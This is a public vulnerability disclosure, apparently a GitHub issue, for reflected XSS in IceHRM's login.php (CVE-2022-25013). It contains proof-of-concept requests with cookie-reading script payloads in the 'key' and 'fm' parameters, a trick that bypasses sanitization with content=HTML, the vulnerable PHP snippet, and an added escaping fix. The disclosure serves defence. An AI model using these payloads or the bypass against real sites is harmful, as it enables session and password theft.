CVE-2022-25013: Reflected XSS vulnerabilities in login.php -- can be used to leak passwords · Issue #284 · gamonoid/icehrm
Ice Hrm 30.0.0.OS was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities via the “key” and “fm” parameters in the component login.php.
Important note:
This vulnerability was reported to the maintainers on Nov 23rd, 2021, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively.
Description
DOM XSS in login.php GET parameter key.
The input to the key GET parameter is not sanitized as required for the context it is reflected into (a JavaScript string literal), and gets reflected in the DOM.
Proof of Concept
Occurrence 1: Request param key
Request:
GET /login.php?key=%27;alert(document.cookie)// HTTP/1.1
Host: icehrmpro.gamonoid.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Alt-Used: icehrmpro.gamonoid.com
Connection: keep-alive
Cookie: PHPSESSID=6jua1ee8xx4s4cqcl3xxx9itr7;
Upgrade-Insecure-Requests: 1
Follow the link: https://icehrmpro.gamonoid.com/login.php?key=%27;alert(document.cookie)// to test this vulnerability on the live demo version of the website.
Occurrence 2: Request param fm
The payload passed in fm gets sanitized by the PHP code. This can be bypassed by adding an extra GET param content with the value HTML, after which the backend does not sanitize the user input at all.
GET /login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML HTTP/1.1
Host: icehrmpro.gamonoid.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Alt-Used: icehrmpro.gamonoid.com
Connection: keep-alive
Cookie: PHPSESSID=6jua1ee8qu4s4cqcl3gqm9itr7; _ga=GA1.2.267929257.1637661597; _gid=GA1.2.561894500.1637661597
Upgrade-Insecure-Requests: 1
Follow the link: https://icehrmpro.gamonoid.com/login.php?f=boo&fm=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&content=HTML to test this vulnerability on the live demo version of the website.
Impact
This vulnerability allows script execution in the victim's browser.
It is possible to run a keylogger script and capture the password of a victim user who logs in by typing in their credentials.
References
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting
Occurrences
HTML sanitization can be bypassed with an extra content=HTML GET param.
https://github.com/gamonoid/icehrm/blob/master/core/login.php#L357-L361
<script type="text/javascript">
var key = "";
<?php if (isset($_REQUEST['key'])) {?>
key = '<?=$_REQUEST['key']?>'; // request value is written unescaped into the JS string literal
key = key.replace(/ /g,"+");
<?php }?>
</script>
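The context-aware fix for both reflection points described above (the key parameter written into a JavaScript string, the fm parameter written into HTML), as an added example that is not IceHRM's own code: the key value is embedded as a JSON-encoded JavaScript string literal instead of being interpolated between quotes, and HTML-context values go through htmlspecialchars. The function names and the rendering helper are assumptions for illustration.

```php
<?php
declare(strict_types=1);
// Added example, not IceHRM's code. Mirrors the shape of the login.php
// snippet from the issue: a request value emitted inside a <script> block.

/**
 * Embed an untrusted value in a <script> block as a JS string literal.
 * json_encode() escapes quotes, backslashes and control characters; the
 * JSON_HEX_* flags additionally turn < > ' " & into \uXXXX escapes, so the
 * value can neither terminate the string literal nor close the <script> tag.
 */
function jsStringLiteral(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
           | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

/** Hardened form of the login.php block quoted in the issue (hypothetical helper). */
function renderKeyScript(?string $key): string
{
    $out = "<script type=\"text/javascript\">\nvar key = \"\";\n";
    if ($key !== null) {
        // Same behaviour as the original, but the value is a proper JS literal.
        $out .= 'key = ' . jsStringLiteral($key) . ";\n";
        $out .= "key = key.replace(/ /g,\"+\");\n";
    }
    return $out . "</script>\n";
}

/** Escape an untrusted value for an HTML text/attribute context (the fm reflection). */
function htmlText(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: the two PoC payloads from the issue, used here only to
// show that the encoders keep them inert in their respective contexts.
$keyPayload = "';alert(document.cookie)//";
$fmPayload  = '<img src=x onerror=alert(document.cookie)>';

echo renderKeyScript($keyPayload);   // the quote becomes \u0027, the literal stays closed
echo htmlText($fmPayload), "\n";     // < and > become &lt; and &gt;, no element is created
```

Note that the content=HTML switch described under Occurrence 2 must not disable this encoding: the output context, not a request parameter, decides which encoder applies.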